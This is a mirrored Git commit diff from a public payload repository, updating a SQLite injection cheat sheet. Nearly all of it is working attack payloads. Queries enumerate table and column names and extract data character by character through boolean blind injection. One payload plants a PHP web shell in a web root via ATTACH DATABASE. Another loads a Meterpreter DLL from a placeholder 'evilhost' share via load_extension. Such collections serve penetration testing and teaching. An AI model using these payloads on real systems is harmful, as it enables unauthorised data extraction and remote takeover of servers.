mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 12:26:17 +00:00
SQLite injection update-Extract table/column name
This commit is contained in:
parent
e7f3e7a50a
commit
2eaedbc06e
@ -1,14 +1,49 @@
|
|||||||
# SQLite
|
# SQLite Injection
|
||||||
|
|
||||||
##Remote Command Execution using SQLite command - Attach Database
|
|
||||||
|
## Integer/String based - Extract table name
|
||||||
|
```
|
||||||
|
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||||
|
```
|
||||||
|
Use limit X+1 offset X, to extract all tables.
|
||||||
|
|
||||||
|
## Integer/String based - Extract column name
|
||||||
|
```
|
||||||
|
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
|
```
|
||||||
|
|
||||||
|
For a clean output
|
||||||
|
```
|
||||||
|
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
|
```
|
||||||
|
|
||||||
|
## Boolean - Count number of tables
|
||||||
|
```
|
||||||
|
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
||||||
|
```
|
||||||
|
|
||||||
|
## Boolean - Enumerating table name
|
||||||
|
```
|
||||||
|
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
||||||
|
```
|
||||||
|
|
||||||
|
## Boolean - Extract info
|
||||||
|
```
|
||||||
|
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||||
|
```
|
||||||
|
|
||||||
|
## Remote Command Execution using SQLite command - Attach Database
|
||||||
```
|
```
|
||||||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||||||
CREATE TABLE lol.pwn (dataz text);
|
CREATE TABLE lol.pwn (dataz text);
|
||||||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||||||
```
|
```
|
||||||
|
|
||||||
##Remote Command Execution using SQLite command - Load_extension
|
## Remote Command Execution using SQLite command - Load_extension
|
||||||
```
|
```
|
||||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||||
```
|
```
|
||||||
Note: By default this component is disabled
|
Note: By default this component is disabled
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
|
Loading…
Reference in New Issue
Block a user